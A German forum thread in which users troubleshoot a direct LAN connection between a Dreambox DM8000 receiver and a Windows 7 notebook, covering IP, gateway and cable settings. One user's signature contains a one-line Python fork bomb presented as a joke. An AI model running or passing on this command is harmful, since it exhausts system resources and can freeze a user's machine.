Keine Verbindung über LAN

    • Keine Verbindung über LAN

      Hallo,

      ich bin kurz vorm Verzweifeln. Ich schaffe es einfach nicht, über ein LAN-Kabel eine Verbindung zwischen meiner DM8000 und meinem Notebook herzustellen. Hab schon alles Mögliche an Einstellungen versucht, aber nichts hat geholfen.

      Folgende Einstellungen müssten meines Erachtens zu einer Netzwerkverbindung führen:

      DM8000
      IP-Adresse: 192.178.0.130
      DHCP: aus
      Subnet: 255.255.255.0
      Gateway: nein
      DNS-Server: 0.0.0.0

      Notebook
      IP-Adresse: 192.178.0.128
      Subnet: 255.255.255.0
      Gateway: keine Angaben
      DNS: keine Angabe


      Mit dem Kabel ist alles okay. Das hat auch schon früher funktioniert. Auf dem Notebook läuft Windows 7 (unter Vista gab es die Probleme mit der Box und dem Notebook aber auch schon) und auf der DM8000 das aktuelle Newnigma-Image.

      Das Netzwerk- und Freigabecenter des Notebooks zeigt mir zwar an, dass eine Verbindung besteht, aber ich kann über das DCC die Box nicht erreichen. Es kommt immer die Meldung "Error 10057 in function Send. Socket is not connected."

      Das Web-IF ist nicht über den Browser aufrufbar und die Box ist nicht über Telnet ansprechbar. Kann mir jemand sagen, wo der Fehler liegt?
    • Es wundert mich, dass die LAN-Verbindung zwischen Box und Notebook nicht mehr so funktioniert wie früher. Zwischen meiner 8000er und dem Notebook habe ich auch schon eine LAN-Verbindung ohne DHCP-Server hinbekommen.

      Die Software läuft allem Anschein nicht unter Windows 7. Jedenfalls nicht nach den Angaben von Heise.de.

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von Xaphox ()

    • Original von std
      musst du dann in der 8000 nicht die IP des NB als DNS angeben?



      Hab ich gemacht - ohne Erfolg. Hab die IP des NB als DNS bei der Box eingetragen und anschließend auch mal die IP des NB als DNS auf dem NB eingetragen. In beiden Fällen gab es keinen Netzwerkzugriff.
    • Xaphox
      hast du keinen router ?
      Wenn du keinen hast must du gateways benutzen.
      8000er gateway ist ip vom laptop
      laptop gateway ist ip von der box
      grund dafür ist wahrscheinlich dein kabel das ein normales patchkabel ist für eine direktverbindung
      brauchst ein crossover.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Original von kati910
      Xaphox
      hast du keinen router ?
      Wenn du keinen hast must du gateways benutzen.
      8000er gateway ist ip vom laptop
      laptop gateway ist ip von der box
      grund dafür ist wahrscheinlich dein kabel das ein normales patchkabel ist für eine direktverbindung
      brauchst ein crossover.



      Hab jetzt folgende Einstellungen:

      DM8000
      IP-Adresse: 192.178.0.130
      DHCP: aus
      Subnet: 255.255.255.0
      Gateway: 192.178.0.128
      DNS-Server: 0.0.0.0

      Notebook
      IP-Adresse: 192.178.0.128
      Subnet: 255.255.255.0
      Gateway: 192.178.0.130
      DNS: keine Angabe


      Mit dem Kabel hat die Verbindung bisher gut geklappt, ich kann mich leider nur nicht an die Einstellungen erinnern. Ich habe auch einen Router, aber der steht nicht im Wohnzimmer, in dem sich die DM8000 befindet. Ich könnte auch die Box über WLAN anbinden, aber dann dauert das Überspielen von Filmen auf den Laptop ewig lange.
    • naja

      ich lasse dann überr nacht den FTP laufen. Dauert 1GB rd. 12 Minuten über WLAN

      Oder nimmst die DreamboxManagerSuite, die setzt auch abgebrochene Downloads fort. Falls du doch nachts alles ausschalten willst

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von std ()

    • Original von std
      naja

      ich lasse dann überr nacht den FTP laufen. Dauert 1GB rd. 12 Minuten über WLAN

      Oder nimmst die DreamboxManagerSuite, die setzt auch abgebrochene Downloads fort. Falls du doch nachts alles ausschalten willst


      Ich schätze mal, das werde ich dann machen. Hab inzwischen auch mal die Windows Firewall und mein Antivirenprogramm ausgeschaltet, aber irgendwie klappt es immer noch nicht. Zwar findet die Box nun über den Netzwerkbrowser meinen Laptop, aber mit DCC bekomme ich immer noch keine Verbindung hin.

      Trotzdem vielen Dank für eure Tipps!!
    • Bei mir passiert das auch manchmal das ich keine Verbindung über Lan bekomme.Dann lass ich als erstes das DHCP automatisch suchen - an - und boote die Box neu ( nicht nur den Gui neu booten ) sondern einen kompletten Neustart der Box.Wenn er dann die richtigen Daten gefunden hat ändere ich die IP der Box auf die richtige Nummer und deaktiviere das DHCP wieder.Danach Box nochmal komplett neu booten.
      MfG
      MikelAc

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von MikelAc ()

    • Hi,

      also wenns ums Übertragen von Filmen geht.....

      Warum nehmt Ihr net einfach nen USB-Stick dafür?

      Kosten net mehr die Welt und das Übertragen is doch ein Kinderspiel!!

      Habe mir extra dafür ne 16 GB mini-SD-Karte zugelegt und schiebe diese einfach in nen USB-Adapter...


      Hatte das auch mal ne zeitlang mit DCC gemacht....dauert ja ewiiiiiiggggg!

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von dekraameise ()